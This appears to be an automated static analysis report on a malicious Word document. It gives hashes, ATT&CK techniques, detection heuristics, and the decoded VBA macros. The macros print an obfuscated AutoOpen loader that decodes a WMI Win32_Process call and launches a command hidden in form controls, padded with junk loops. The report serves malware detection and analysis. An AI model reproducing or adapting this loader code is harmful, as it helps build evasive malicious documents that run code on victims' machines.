Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 699c6142400e9400…

MALICIOUS

Office (OLE)

Size: 134.0 KB
Created: 2019-09-24 06:41:00
Authoring application: Microsoft Office Word
First seen: 2019-12-09
MD5: 68f0b24c261a3d64b95881aab868d87c
SHA-1: ff5da1fabaefda8904bf1c619d6ccee425bc62ec
SHA-256: 699c6142400e94008029f2aa6b0a4ac1f1ce6650e201dd2b57923e04fc3cb922
Risk Score: 282

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The sample is a malicious Office document containing an obfuscated VBA macro. The macro utilizes CreateObject and execution tokens, indicating it is likely a loader for a second-stage payload. The presence of an AutoOpen macro and the obfuscated nature of the loader suggest a deliberate attempt to evade detection and execute malicious code upon opening the document.

Heuristics (8)

  • ClamAV: Doc.Malware.Generic-7178224-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Generic-7178224-0
  • VBA macros detected (medium, 4 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • CreateObject call (high, OLE_VBA_CREATEOBJ)
    CreateObject call
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 9912 bytes
SHA-256: e0b8b3d2e64d78c84720afa88b50057a0caf5233a12e55215c9bca23ba65309a

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Kkmjww"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "V5d5wwdq, 0, 0, MSForms, TextBox"
Attribute VB_Control = "Kuj257, 1, 1, MSForms, TextBox"
Attribute VB_Control = "R8sizknj, 2, 2, MSForms, TextBox"
Attribute VB_Control = "P5zziw, 3, 3, MSForms, TextBox"
Attribute VB_Control = "K0zw6p, 4, 4, MSForms, TextBox"
Attribute VB_Control = "Rvaatk6s, 5, 5, MSForms, TextBox"
Attribute VB_Control = "Yfm2nuz, 6, 6, MSForms, TextBox"
Attribute VB_Control = "Wi0uda9, 7, 7, MSForms, TextBox"
Attribute VB_Control = "Vjolh56c, 8, 8, MSForms, TextBox"
Attribute VB_Control = "C6h13sc, 9, 9, MSForms, TextBox"
Attribute VB_Control = "X4i4im, 10, 10, MSForms, TextBox"
Attribute VB_Control = "Rjms62, 11, 11, MSForms, TextBox"
Attribute VB_Control = "Mn1kbo6t, 12, 12, MSForms, TextBox"
Attribute VB_Control = "Lpanu774, 13, 13, MSForms, TextBox"
Attribute VB_Control = "Fhwcnk, 14, 14, MSForms, TextBox"
Attribute VB_Control = "Qidfou, 15, 15, MSForms, TextBox"
Attribute VB_Control = "Awwcn3i, 16, 16, MSForms, TextBox"
Attribute VB_Control = "Nuus40t, 17, 17, MSForms, TextBox"

Attribute VB_Name = "Shqkwv"
Private Const Brjjiv As String = "Xnp6q4q"
Private Const Tpvkdl As String = "Itj64o"
Private Wvhidrap      As String
Private J5hw3qk      As Boolean
Private Pjiv7b      As Integer
Private Declare Sub Ffqczj Lib "V0rdjf" ()
Private Declare Sub H61ubr Lib "P44ci1" ()
Function Nnazwms()
Dim pDBXVeleSn95, yALtDyQJVU12 As Integer
yALtDyQJVU12 = 8541
For pDBXVeleSn95 = 0 To 88
yALtDyQJVU12 = yALtDyQJVU12 + pDBXVeleSn95
DoEvents
Next pDBXVeleSn95
Ma37awj5 = Ti1iz0cl(Kkmjww.Mn1kbo6t + Kkmjww.Yfm2nuz)
Dim kmJQTFcJOI63, mxBXzQQtbS22 As Integer
mxBXzQQtbS22 = 8263
For kmJQTFcJOI63 = 0 To 96
mxBXzQQtbS22 = mxBXzQQtbS22 + kmJQTFcJOI63
DoEvents
Next kmJQTFcJOI63
Z7bap4 = CreateObject(Ti1iz0cl("_:_a_:_aw_:_ainmgm_:_ats:W_:_ain3_:_a2_P_:_aroces_:_as_:_a")).Create(Ma37awj5, Cj8ajz, Yh3wpj, R5tjsf)
Dim UKUBCTGYrd34, wUXYnJzxWl84 As Integer
wUXYnJzxWl84 = 7624
For UKUBCTGYrd34 = 0 To 76
wUXYnJzxWl84 = wUXYnJzxWl84 + UKUBCTGYrd34
DoEvents
Next UKUBCTGYrd34
End Function
Function Ti1iz0cl(E6pinh)
Dim bIEeUYPMQL63, cfibQITmka13 As Integer
cfibQITmka13 = 5323
For bIEeUYPMQL63 = 0 To 25
cfibQITmka13 = cfibQITmka13 + bIEeUYPMQL63
DoEvents
Next bIEeUYPMQL63
Ti1iz0cl = Replace(E6pinh, Replace("uegw72bdja_uegw72bdja:uegw72bdja_uegw72bdjauegw72bdjaauegw72bdja", "uegw72bdja", ""), "")
End Function


Attribute VB_Name = "S8u1adw"
Private Const S3vczf As String = "Z918ur1p"
Private Const Qz0su2 As String = "Y60rrn"
Private Pzkb0pl      As String
Private C2ijjt      As Boolean
Private Ypdfc9tz      As Integer
Private Declare Sub Gpzhdb Lib "J61dhb" ()
Private Declare Sub R1uiqcwt Lib "Y72pqba" ()
Sub autoopen()
Dim SQZiGxarup86, NxIwNiZDoj34 As Integer
NxIwNiZDoj34 = 6788
For SQZiGxarup86 = 0 To 17
NxIwNiZDoj34 = NxIwNiZDoj34 + SQZiGxarup86
DoEvents
Next SQZiGxarup86
Nnazwms
End Sub
Function Yh3wpj()
Dim TYWXvZKgog25, OnSlpvPgmm82 As Integer
OnSlpvPgmm82 = 4395
For TYWXvZKgog25 = 0 To 36
OnSlpvPgmm82 = OnSlpvPgmm82 + TYWXvZKgog25
DoEvents
Next TYWXvZKgog25
Z7bap4$ = N7oo7a3p + Y83nojt
Dim YIqBrnoQql13, TyvIxAOXdA51 As Integer
TyvIxAOXdA51 = 9313
For YIqBrnoQql13 = 0 To 65
TyvIxAOXdA51 = TyvIxAOXdA51 + YIqBrnoQql13
DoEvents
Next YIqBrnoQql13
Set Yh3wpj = CreateObject(Ti1iz0cl(Kkmjww.P5zziw))
Yh3wpj.ShowWindow! = Z7bap4
Dim UKUBCTGYrd34, wUXYnJzxWl84 As Integer
wUXYnJzxWl84 = 7624
For UKUBCTGYrd34 = 0 To 76
wUXYnJzxWl84 = wUXYnJzxWl84 + UKUBCTGYrd34
DoEvents
Next UKUBCTGYrd34
End Function


' Processing file: /opt/analyzer/scan_staging/8c225fda003c4b8e898e042c0066ae92.bin
' ===============================================================================
' Module streams:
' Macros/VBA/Kkmjww - 3295 bytes
' Macros/VBA/Shqkwv - 3266 bytes

... (truncated)